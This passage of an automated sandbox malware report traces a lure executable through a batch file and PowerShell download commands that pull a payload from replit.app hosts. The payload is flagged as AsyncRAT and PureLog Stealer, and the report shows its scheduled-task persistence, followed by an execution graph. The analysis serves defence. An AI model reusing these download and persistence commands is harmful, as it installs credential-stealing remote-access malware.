                                      Path:C:\Users\user\Desktop\JuneOrder.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\JuneOrder.exe"
                                      Imagebase:0x400000
                                      File size:522'240 bytes
                                      MD5 hash:2B19D65705EEE546214513FB65948B2A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:05:11:20
                                      Start date:30/07/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\BC2F.tmp\BC30.tmp\BC31.bat C:\Users\user\Desktop\JuneOrder.exe"
                                      Imagebase:0x7ff6375d0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:05:11:20
                                      Start date:30/07/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6ee680000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:4
                                      Start time:05:11:20
                                      Start date:30/07/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"
                                      Imagebase:0x7ff6cb6b0000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:05:11:25
                                      Start date:30/07/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe' -OutFile CoinAIfdp.exe"
                                      Imagebase:0x7ff6cb6b0000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:6
                                      Start time:05:11:29
                                      Start date:30/07/2024
                                      Path:C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe
                                      Wow64 process (32bit):true
                                      Commandline:CoinAIfdp.exe
                                      Imagebase:0x9a0000
                                      File size:402'432 bytes
                                      MD5 hash:1B3E4783A56A59A811CBD437C6C34A18
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.1629482910.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000000.1560929990.00000000009A2000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000002.1631153124.0000000006040000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.1631153124.0000000006040000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000006.00000002.1631153124.0000000006040000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000006.00000002.1631153124.0000000006040000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000002.1627064345.0000000000EE3000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000002.1630249483.00000000055B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000006.00000002.1630249483.00000000055B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000006.00000002.1630249483.00000000055B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000006.00000002.1630249483.00000000055B0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000002.1627907131.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000006.00000002.1627907131.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000006.00000002.1627907131.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000006.00000002.1627907131.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000002.1627907131.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 71%, ReversingLabs
                                      • Detection: 59%, Virustotal, Browse
                                      Reputation:low
                                      Has exited:true

                                      Target ID:7
                                      Start time:05:11:35
                                      Start date:30/07/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' & exit
                                      Imagebase:0xa40000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:8
                                      Start time:05:11:35
                                      Start date:30/07/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6ee680000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:9
                                      Start time:05:11:35
                                      Start date:30/07/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE1C4.tmp.bat""
                                      Imagebase:0xa40000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:10
                                      Start time:05:11:35
                                      Start date:30/07/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6ee680000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:11
                                      Start time:05:11:35
                                      Start date:30/07/2024
                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                      Wow64 process (32bit):true
                                      Commandline:schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"'
                                      Imagebase:0xc30000
                                      File size:187'904 bytes
                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:12
                                      Start time:05:11:35
                                      Start date:30/07/2024
                                      Path:C:\Windows\SysWOW64\timeout.exe
                                      Wow64 process (32bit):true
                                      Commandline:timeout 3
                                      Imagebase:0x120000
                                      File size:25'088 bytes
                                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:13
                                      Start time:05:11:37
                                      Start date:30/07/2024
                                      Path:C:\Users\user\AppData\Roaming\svchst.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\svchst.exe
                                      Imagebase:0x810000
                                      File size:402'432 bytes
                                      MD5 hash:1B3E4783A56A59A811CBD437C6C34A18
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000D.00000002.1705552940.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000D.00000002.1706148434.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 0000000D.00000002.1706148434.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000D.00000002.1706148434.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000D.00000002.1706148434.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\svchst.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\svchst.exe, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 71%, ReversingLabs
                                      • Detection: 59%, Virustotal, Browse
                                      Reputation:low
                                      Has exited:true

                                      Target ID:15
                                      Start time:05:11:38
                                      Start date:30/07/2024
                                      Path:C:\Users\user\AppData\Roaming\svchst.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\svchst.exe"
                                      Imagebase:0x6e0000
                                      File size:402'432 bytes
                                      MD5 hash:1B3E4783A56A59A811CBD437C6C34A18
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000F.00000002.2725016473.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000F.00000002.2727513271.0000000002A1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000F.00000002.2727513271.0000000002A1A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000F.00000002.2727513271.0000000002A1A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000F.00000002.2727513271.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000F.00000002.2727513271.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000F.00000002.2725016473.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      Reputation:low
                                      Has exited:false

                                      Target ID:16
                                      Start time:05:11:40
                                      Start date:30/07/2024
                                      Path:C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe"
                                      Imagebase:0x640000
                                      File size:402'432 bytes
                                      MD5 hash:1B3E4783A56A59A811CBD437C6C34A18
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000010.00000002.1721681170.0000000000C2A000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000010.00000002.1723329658.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000010.00000002.1723329658.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000010.00000002.1723329658.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000010.00000002.1723329658.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      Reputation:low
                                      Has exited:true

                                      Target ID:17
                                      Start time:05:11:48
                                      Start date:30/07/2024
                                      Path:C:\Users\user\AppData\Roaming\svchst.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\svchst.exe"
                                      Imagebase:0x80000
                                      File size:402'432 bytes
                                      MD5 hash:1B3E4783A56A59A811CBD437C6C34A18
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000011.00000002.1800707504.00000000028C6000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000011.00000002.1799807580.0000000000821000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      Reputation:low
                                      Has exited:true

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:12.5%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:1.7%
                                        Total number of Nodes:2000
                                        Total number of Limit Nodes:34
                                        execution_graph 10282 402e57 10283 40dfc0 21 API calls 10282->10283 10284 402e5d 10283->10284 10285 40a4f4 5 API calls 10284->10285 10286 402e68 10285->10286 10295 40de80 GetLastError TlsGetValue SetLastError 10286->10295 10288 402e6e 10296 40de80 GetLastError TlsGetValue SetLastError 10288->10296 10290 402e76 10291 409bc0 4 API calls 10290->10291 10292 402e81 10291->10292 10293 40dec0 3 API calls 10292->10293 10294 402e90 10293->10294 10295->10288 10296->10290 7325 401000 memset GetModuleHandleW HeapCreate 7326 401044 7325->7326 7375 40de30 HeapCreate TlsAlloc 7326->7375 7328 401053 7378 40aaa0 7328->7378 7330 40105d 7381 409b40 HeapCreate 7330->7381 7332 40106c 7382 409669 7332->7382 7334 401071 7387 408dee memset InitCommonControlsEx CoInitialize 7334->7387 7336 401076 7388 4053bb InitializeCriticalSection 7336->7388 7338 40107b 7389 405068 7338->7389 7347 40a3da 16 API calls 7348 4010f4 7347->7348 7349 40a348 13 API calls 7348->7349 7350 40110f 7349->7350 7420 40dbca 7350->7420 7352 40112d 7353 405068 4 API calls 7352->7353 7354 40113d 7353->7354 7355 40a3da 16 API calls 7354->7355 7356 401148 7355->7356 7357 40a348 13 API calls 7356->7357 7358 401163 7357->7358 7426 409930 7358->7426 7360 40116f 7432 40de80 GetLastError TlsGetValue SetLastError 7360->7432 7362 401175 7433 402f41 7362->7433 7366 401186 7458 401b8f 7366->7458 7369 40119b 7565 403df3 7369->7565 7909 40e6a0 HeapAlloc HeapAlloc TlsSetValue 7375->7909 7377 40de57 7377->7328 7910 40d52c HeapAlloc HeapAlloc InitializeCriticalSection 7378->7910 7380 40aaae 7380->7330 7381->7332 7911 40d353 7382->7911 7386 409687 InitializeCriticalSection 7386->7334 7387->7336 7388->7338 7923 40e130 7389->7923 7391 401095 GetStdHandle 7392 409de0 7391->7392 7930 409ecf 7392->7930 7395 4010c3 7404 40a3da 7395->7404 7396 409e0b 7397 409e14 7396->7397 7398 409e17 HeapAlloc 7396->7398 7397->7398 7399 409e93 HeapFree 7398->7399 7401 409e2e 7398->7401 7400 409ea4 7399->7400 7400->7395 7941 40d819 7401->7941 7405 40a3e3 7404->7405 7406 4010ce 7404->7406 8010 40a496 7405->8010 7415 40a348 HeapAlloc 7406->7415 7409 40d946 9 API calls 7410 40a3f3 7409->7410 7411 40a420 7410->7411 7412 40a40e HeapFree 7410->7412 7413 40a433 HeapFree 7411->7413 7414 40a427 HeapFree 7411->7414 7412->7411 7412->7412 7413->7406 7414->7413 7416 40a367 HeapAlloc 7415->7416 7417 40a37c 7415->7417 7416->7417 7418 40d819 11 API calls 7417->7418 7419 4010e9 7418->7419 7419->7347 8017 40dd1d 7420->8017 7423 40dbe7 RtlAllocateHeap 7424 40dc06 memset 7423->7424 7425 40dc4a 7423->7425 7424->7425 7425->7352 7427 409a50 7426->7427 7428 409a58 7427->7428 7429 409a7a SetUnhandledExceptionFilter 7427->7429 7430 409a61 SetUnhandledExceptionFilter 7428->7430 7431 409a6b SetUnhandledExceptionFilter 7428->7431 7429->7360 7430->7431 7431->7360 7432->7362 8023 40dfc0 7433->8023 7437 402f56 8038 40de80 GetLastError TlsGetValue SetLastError 7437->8038 7439 402fab 8039 40de80 GetLastError TlsGetValue SetLastError 7439->8039 7441 402fb3 8040 40de80 GetLastError TlsGetValue SetLastError 7441->8040 7443 402fbb 8041 40de80 GetLastError TlsGetValue SetLastError 7443->8041 7445 402fc3 8042 40d120 7445->8042 7449 402fde 8047 405eb0 7449->8047 7451 402fe6 8057 405170 TlsGetValue 7451->8057 7453 40117c 7454 40dec0 TlsGetValue 7453->7454 7455 40df06 RtlReAllocateHeap 7454->7455 7456 40dee9 RtlAllocateHeap 7454->7456 7457 40df27 7455->7457 7456->7457 7457->7366 7459 40dfc0 21 API calls 7458->7459 7460 401b9e 7459->7460 8082 40de80 GetLastError TlsGetValue SetLastError 7460->8082 7462 401ba4 8083 40de80 GetLastError TlsGetValue SetLastError 7462->8083 7464 401bb6 8084 40de80 GetLastError TlsGetValue SetLastError 7464->8084 7466 401bbe 8085 409698 7466->8085 7470 401bca LoadLibraryExW 7471 4051a0 3 API calls 7470->7471 7472 401bd7 EnumResourceTypesW FreeLibrary 7471->7472 7489 401c02 7472->7489 7473 401e16 7473->7473 7474 401ca0 7475 40a496 4 API calls 7474->7475 7477 401cab 7475->7477 7476 40de80 GetLastError TlsGetValue SetLastError 7476->7489 8093 40de80 GetLastError TlsGetValue SetLastError 7477->8093 7479 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7479->7489 7480 401cb1 8094 40de80 GetLastError TlsGetValue SetLastError 7480->8094 7482 401cb9 8095 40de80 GetLastError TlsGetValue SetLastError 7482->8095 7484 401cc1 8096 40de80 GetLastError TlsGetValue SetLastError 7484->8096 7486 401cc9 8097 40de80 GetLastError TlsGetValue SetLastError 7486->8097 7488 401cd6 8098 40de80 GetLastError TlsGetValue SetLastError 7488->8098 7489->7473 7489->7474 7489->7476 7489->7479 7494 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7489->7494 7491 401cde 8099 405e10 7491->8099 7494->7489 7496 401cee 8108 40d100 7496->8108 7500 401cfb 7501 405eb0 6 API calls 7500->7501 7502 401d03 7501->7502 7503 40dec0 3 API calls 7502->7503 7504 401d0d 7503->7504 8112 40de80 GetLastError TlsGetValue SetLastError 7504->8112 7506 401d17 8113 40e020 7506->8113 7508 401d1f 7509 40dec0 3 API calls 7508->7509 7510 401d29 7509->7510 8118 40de80 GetLastError TlsGetValue SetLastError 7510->8118 7512 401d2f 8119 40de80 GetLastError TlsGetValue SetLastError 7512->8119 7514 401d37 8120 40de80 GetLastError TlsGetValue SetLastError 7514->8120 7516 401d3f 8121 40de80 GetLastError TlsGetValue SetLastError 7516->8121 7518 401d47 7519 40d100 8 API calls 7518->7519 7520 401d57 7519->7520 8122 405182 TlsGetValue 7520->8122 7522 401d5c 7523 405eb0 6 API calls 7522->7523 7524 401d64 7523->7524 7525 40dec0 3 API calls 7524->7525 7526 401d6e 7525->7526 8123 40de80 GetLastError TlsGetValue SetLastError 7526->8123 7528 401d74 8124 40de80 GetLastError TlsGetValue SetLastError 7528->8124 7530 401d7c 8125 405f20 7530->8125 7532 401d8c 7533 40dec0 3 API calls 7532->7533 7534 401d96 7533->7534 7534->7473 8133 40985e 7534->8133 7537 401e12 7540 40df50 HeapFree 7537->7540 7539 401db5 8139 40de80 GetLastError TlsGetValue SetLastError 7539->8139 7542 401e2b 7540->7542 7544 40df50 HeapFree 7542->7544 7543 401dbd 8140 409872 7543->8140 7546 401e34 7544->7546 7548 40df50 HeapFree 7546->7548 7550 401e3d 7548->7550 7552 40df50 HeapFree 7550->7552 7551 401dce 8150 405160 7551->8150 7554 401e46 7552->7554 7555 40df50 HeapFree 7554->7555 7556 40118b 7555->7556 7556->7369 7792 403001 7556->7792 7557 401dd9 7557->7537 8153 40de80 GetLastError TlsGetValue SetLastError 7557->8153 7559 401df2 8154 40de80 GetLastError TlsGetValue SetLastError 7559->8154 7561 401dfa 7562 409872 21 API calls 7561->7562 7563 401e06 7562->7563 7564 40dec0 3 API calls 7563->7564 7564->7537 7566 403df9 7565->7566 7566->7566 7567 40dfc0 21 API calls 7566->7567 7583 403e0b 7567->7583 7568 405dc0 3 API calls 7568->7583 7569 40de80 GetLastError TlsGetValue SetLastError 7590 403e8c 7569->7590 7570 40de80 GetLastError TlsGetValue SetLastError 7596 403f0d 7570->7596 7571 405dc0 3 API calls 7571->7590 7572 40de80 GetLastError TlsGetValue SetLastError 7572->7583 7573 405dc0 3 API calls 7573->7596 7574 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7574->7583 7575 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7575->7596 7576 405dc0 3 API calls 7601 403f8e 7576->7601 7577 40de80 GetLastError TlsGetValue SetLastError 7606 40400f 7577->7606 7578 40de80 GetLastError TlsGetValue SetLastError 7611 404090 7578->7611 7579 40de80 GetLastError TlsGetValue SetLastError 7620 404115 7579->7620 7580 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7580->7590 7581 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7581->7601 7583->7568 7583->7572 7583->7574 7588 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7583->7588 7583->7590 7584 40de80 GetLastError TlsGetValue SetLastError 7584->7601 7585 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7585->7606 7586 405dc0 3 API calls 7586->7611 7587 40de80 GetLastError TlsGetValue SetLastError 7612 40419a 7587->7612 7588->7583 7589 4042a4 8189 40de80 GetLastError TlsGetValue SetLastError 7589->8189 7590->7569 7590->7571 7590->7580 7591 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7590->7591 7590->7596 7591->7590 7592 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7592->7596 7593 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7593->7601 7594 405dc0 3 API calls 7594->7620 7596->7570 7596->7573 7596->7575 7596->7592 7596->7601 7597 4042b0 7600 40e020 4 API calls 7597->7600 7598 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7598->7620 7599 405dc0 3 API calls 7599->7612 7602 4042b8 7600->7602 7601->7576 7601->7581 7601->7584 7601->7593 7601->7606 7605 40e020 4 API calls 7602->7605 7603 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7603->7606 7604 405dc0 3 API calls 7607 40421f 7604->7607 7608 4042c2 7605->7608 7606->7577 7606->7585 7606->7603 7606->7611 8186 405dc0 7606->8186 7607->7589 7607->7604 7618 40de80 GetLastError TlsGetValue SetLastError 7607->7618 7624 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7607->7624 7627 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7607->7627 7610 40dec0 3 API calls 7608->7610 7609 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7609->7611 7613 4042ce 7610->7613 7611->7578 7611->7586 7611->7609 7615 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7611->7615 7611->7620 7612->7587 7612->7599 7612->7607 7617 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7612->7617 7623 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7612->7623 8190 40de80 GetLastError TlsGetValue SetLastError 7613->8190 7615->7611 7616 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7616->7620 7617->7612 7618->7607 7619 4042d4 8191 403275 7619->8191 7620->7579 7620->7594 7620->7598 7620->7612 7620->7616 7623->7612 7624->7607 7625 40dec0 3 API calls 7626 4042ed 7625->7626 7628 40985e 17 API calls 7626->7628 7627->7607 7629 4042f2 GetModuleHandleW 7628->7629 8284 40de80 GetLastError TlsGetValue SetLastError 7629->8284 7631 40430b 8285 40de80 GetLastError TlsGetValue SetLastError 7631->8285 7633 404313 8286 40de80 GetLastError TlsGetValue SetLastError 7633->8286 7635 40431b 8287 40de80 GetLastError TlsGetValue SetLastError 7635->8287 7637 404323 7638 40d100 8 API calls 7637->7638 7639 404335 7638->7639 8288 405182 TlsGetValue 7639->8288 7641 40433a 7642 405eb0 6 API calls 7641->7642 7643 404342 7642->7643 7644 40dec0 3 API calls 7643->7644 7645 40434c 7644->7645 8289 40de80 GetLastError TlsGetValue SetLastError 7645->8289 7647 404352 8290 40de80 GetLastError TlsGetValue SetLastError 7647->8290 7649 40435a 8291 40de80 GetLastError TlsGetValue SetLastError 7649->8291 7651 404362 8292 40de80 GetLastError TlsGetValue SetLastError 7651->8292 7653 40436a 7654 40d100 8 API calls 7653->7654 7655 40437a 7654->7655 8293 405182 TlsGetValue 7655->8293 7657 40437f 7658 405eb0 6 API calls 7657->7658 7659 404387 7658->7659 7660 40dec0 3 API calls 7659->7660 7661 404391 7660->7661 8294 402e9d 7661->8294 7665 4043a4 8311 4021a4 7665->8311 7668 4051a0 3 API calls 7669 4043b4 7668->7669 8427 40195b 7669->8427 7675 4043c8 8518 40358d 7675->8518 7678 40dec0 3 API calls 7679 4043ee PathRemoveBackslashW 7678->7679 7680 404402 7679->7680 8646 40de80 GetLastError TlsGetValue SetLastError 7680->8646 7682 404408 8647 40de80 GetLastError TlsGetValue SetLastError 7682->8647 7684 404410 8648 402bfa 7684->8648 7688 404422 8678 405182 TlsGetValue 7688->8678 7690 40442b 8679 4098c0 7690->8679 7693 4051a0 3 API calls 7694 404439 7693->7694 8683 40de80 GetLastError TlsGetValue SetLastError 7694->8683 7696 404445 7697 40e020 4 API calls 7696->7697 7698 40444d 7697->7698 7699 40e020 4 API calls 7698->7699 7700 404459 7699->7700 7701 40dec0 3 API calls 7700->7701 7702 404465 7701->7702 8684 40de80 GetLastError TlsGetValue SetLastError 7702->8684 7704 40446b 8685 401e55 7704->8685 7707 40dec0 3 API calls 7708 404480 7707->7708 8731 403855 7708->8731 7712 404491 7713 40e020 4 API calls 7712->7713 7714 404499 7713->7714 7715 40dec0 3 API calls 7714->7715 7716 4044a3 PathQuoteSpacesW 7715->7716 8925 40de80 GetLastError TlsGetValue SetLastError 7716->8925 7718 4044b6 7719 40e020 4 API calls 7718->7719 7720 4044be 7719->7720 7721 40e020 4 API calls 7720->7721 7722 